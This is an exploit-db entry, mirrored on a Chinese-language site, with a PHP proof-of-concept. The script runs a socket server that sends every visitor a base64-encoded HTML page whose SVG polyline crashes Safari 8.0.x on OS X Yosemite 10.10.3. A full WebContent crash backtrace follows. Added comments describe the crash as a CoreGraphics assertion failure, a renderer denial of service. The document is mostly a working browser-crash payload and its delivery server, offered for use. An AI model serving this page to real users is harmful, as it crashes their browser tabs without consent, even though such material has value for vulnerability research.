Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x – Crash (PoC)

  • 作者: Mohammad Reza Espargham
    日期: 2015-06-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37386/
  • #!/usr/bin/php
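    <?php
    # Title:Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of Concept
    # Product Website:https://www.apple.com/safari/
    # Author :Mohammad Reza Espargham
    # Linkedin :https://ir.linkedin.com/in/rezasp
    # E-Mail :me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
    # Website:www.reza.es
    # Twitter:https://twitter.com/rezesp
    # FaceBook :https://www.facebook.com/mohammadreza.espargham
    
    
    
    # Usage :
    # php poc.php [bind-address] [port]
    # Open Safari and open ip:8080 / 127.0.0.1:8080
    # Crashed ;)
    #
    # Both arguments are optional and default to the original behaviour:
    # bind address 0 (every local interface) and port 8080.  Passing
    # 127.0.0.1 as the first argument keeps the test page reachable from
    # this host only, which is what you want on a shared network.
    #
    # What the crash report below shows: the WebContent process aborts via
    # __assert_rtn inside CGPathCreateMutableCopyByTransformingPath while
    # painting the SVG polyline served here.  That is a failed CoreGraphics
    # assertion (a denial of service of the renderer process); the report
    # by itself does not demonstrate memory corruption.
    
    #Main POC Code
    $bind_addr = isset($argv[1]) ? $argv[1] : 0;
    $bind_port = isset($argv[2]) ? (int) $argv[2] : 8080;
    
    $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
    # Without SO_REUSEADDR a re-run while the old port is still in TIME_WAIT
    # fails at bind time with no useful message.
    socket_set_option($reza, SOL_SOCKET, SO_REUSEADDR, 1);
    socket_bind($reza, $bind_addr, $bind_port) or die("Failed to bind $bind_addr:$bind_port!\n");
    socket_listen($reza) or die("Failed to listen on $bind_addr:$bind_port!\n");
    print "\nNow Open Safari and open ip:$bind_port / 127.0.0.1:$bind_port\n\n";
    
    # Base64 of the static HTML page that triggers the crash (unchanged).
    $msg = 
    'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
    $msgd = base64_decode($msg);
    
    # The response never changes, so build it once instead of per connection.
    # "Connection: close" tells the browser not to wait for keep-alive reuse
    # of a socket we are about to close.
    $response = "HTTP/1.1 200 OK\r\n" .
                "Content-length: " . strlen($msgd) . "\r\n" .
                "Content-Type: text/html; charset=UTF-8\r\n" .
                "Connection: close\r\n\r\n" .
                $msgd;
    
    for (;;) {
        $client = @socket_accept($reza);
        if ($client === false) {
            # accept() failed (not "no connection yet" - the socket is
            # blocking); back off briefly instead of spinning on the error.
            usleep(100000);
            continue;
        }
        # The request line is never read: every connection gets the same page.
        socket_write($client, $response);
        # The original never closed accepted sockets, leaking one descriptor
        # per browser hit until the process ran out of them.
        socket_close($client);
    }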
    
    
    
    
    
    #Crash Report
    /*
    
    Process Model:
    Multiple Web Processes
    
    
    Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
    0   libsystem_kernel.dylib          0x00007fff8e628286 __pthread_kill + 10
    1   libsystem_c.dylib               0x00007fff90619b53 abort + 129
    2   libsystem_c.dylib               0x00007fff905e1c39 __assert_rtn + 321
    3   com.apple.CoreGraphics          0x00007fff87716e4e CGPathCreateMutableCopyByTransformingPath + 242
    4   com.apple.CoreGraphics          0x00007fff8773aff0 CGContextAddPath + 93
    5   com.apple.WebCore               0x0000000104ea8c84 WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
    6   com.apple.WebCore               0x000000010597e851 WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
    7   com.apple.WebCore               0x000000010597f08a WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
    8   com.apple.WebCore               0x000000010597f3c3 WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
    9   com.apple.WebCore               0x0000000104fa73cb WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379
    10  com.apple.WebCore               0x0000000104fa7062 WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1330
    11  com.apple.WebCore               0x0000000104f1ee72 WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722
    12  com.apple.WebCore               0x0000000105429e88 WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312
    13  com.apple.WebCore               0x0000000104ea4a63 WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
    14  com.apple.WebCore               0x0000000104ea4509 WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
    15  com.apple.WebCore               0x0000000104e53d96 WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
    16  com.apple.WebCore               0x0000000104e51373 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67
    17  com.apple.WebCore               0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    18  com.apple.WebCore               0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    19  com.apple.WebCore               0x00000001058db139 WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
    20  com.apple.WebCore               0x0000000104e51478 WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
    21  com.apple.WebCore               0x0000000104e51420 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
    22  com.apple.WebCore               0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
    23  com.apple.WebCore               0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
    24  com.apple.WebCore               0x0000000104e512b2 WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370
    25  com.apple.WebCore               0x0000000104e50f87 WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423
    26  com.apple.WebCore               0x0000000104e4fc30 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
    27  com.apple.WebCore               0x0000000104e4f002 WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
    28  com.apple.WebCore               0x0000000104e4fd62 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
    29  com.apple.WebCore               0x0000000104e7ac36 WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358
    30  com.apple.WebCore               0x000000010593757f WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799
    31  com.apple.WebCore               0x000000010537dd44 WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132
    32  com.apple.WebCore               0x00000001058b6ad9 WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361
    33  com.apple.WebCore               0x0000000105b170a7 WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
    34  com.apple.WebCore               0x0000000105ba36cc -[WebSimpleLayer drawInContext:] + 172
    35  com.apple.QuartzCore            0x00007fff8d7033c7 CABackingStoreUpdate_ + 3306
    36  com.apple.QuartzCore            0x00007fff8d7026d7 ___ZN2CA5Layer8display_Ev_block_invoke + 59
    37  com.apple.QuartzCore            0x00007fff8d702694 x_blame_allocations + 81
    38  com.apple.QuartzCore            0x00007fff8d6f643c CA::Layer::display_() + 1546
    39  com.apple.WebCore               0x0000000105ba35eb -[WebSimpleLayer display] + 43
    40  com.apple.QuartzCore            0x00007fff8d6f47fd CA::Layer::display_if_needed(CA::Transaction*) + 603
    41  com.apple.QuartzCore            0x00007fff8d6f3e81 CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
    42  com.apple.QuartzCore            0x00007fff8d6f3612 CA::Context::commit_transaction(CA::Transaction*) + 242
    43  com.apple.QuartzCore            0x00007fff8d6f33ae CA::Transaction::commit() + 390
    44  com.apple.QuartzCore            0x00007fff8d701f19 CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71
    45  com.apple.CoreFoundation        0x00007fff869f7127 __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
    46  com.apple.CoreFoundation        0x00007fff869f7080 __CFRunLoopDoObservers + 368
    47  com.apple.CoreFoundation        0x00007fff869e8bf8 CFRunLoopRunSpecific + 328
    48  com.apple.HIToolbox             0x00007fff8df1156f RunCurrentEventLoopInMode + 235
    49  com.apple.HIToolbox             0x00007fff8df112ea ReceiveNextEventCommon + 431
    50  com.apple.HIToolbox             0x00007fff8df1112b _BlockUntilNextEventMatchingListInModeWithFilter + 71
    51  com.apple.AppKit                0x00007fff8ebe59bb _DPSNextEvent + 978
    52  com.apple.AppKit                0x00007fff8ebe4f68 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
    53  com.apple.AppKit                0x00007fff8ebdabf3 -[NSApplication run] + 594
    54  com.apple.AppKit                0x00007fff8eb57354 NSApplicationMain + 1832
    55  libxpc.dylib                    0x00007fff8ab77958 _xpc_objc_main + 793
    56  libxpc.dylib                    0x00007fff8ab79060 xpc_main + 490
    57  com.apple.WebKit.WebContent     0x0000000103f10b40 0x103f10000 + 2880
    58  libdyld.dylib                   0x00007fff873e45c9 start + 1
    */
    ?>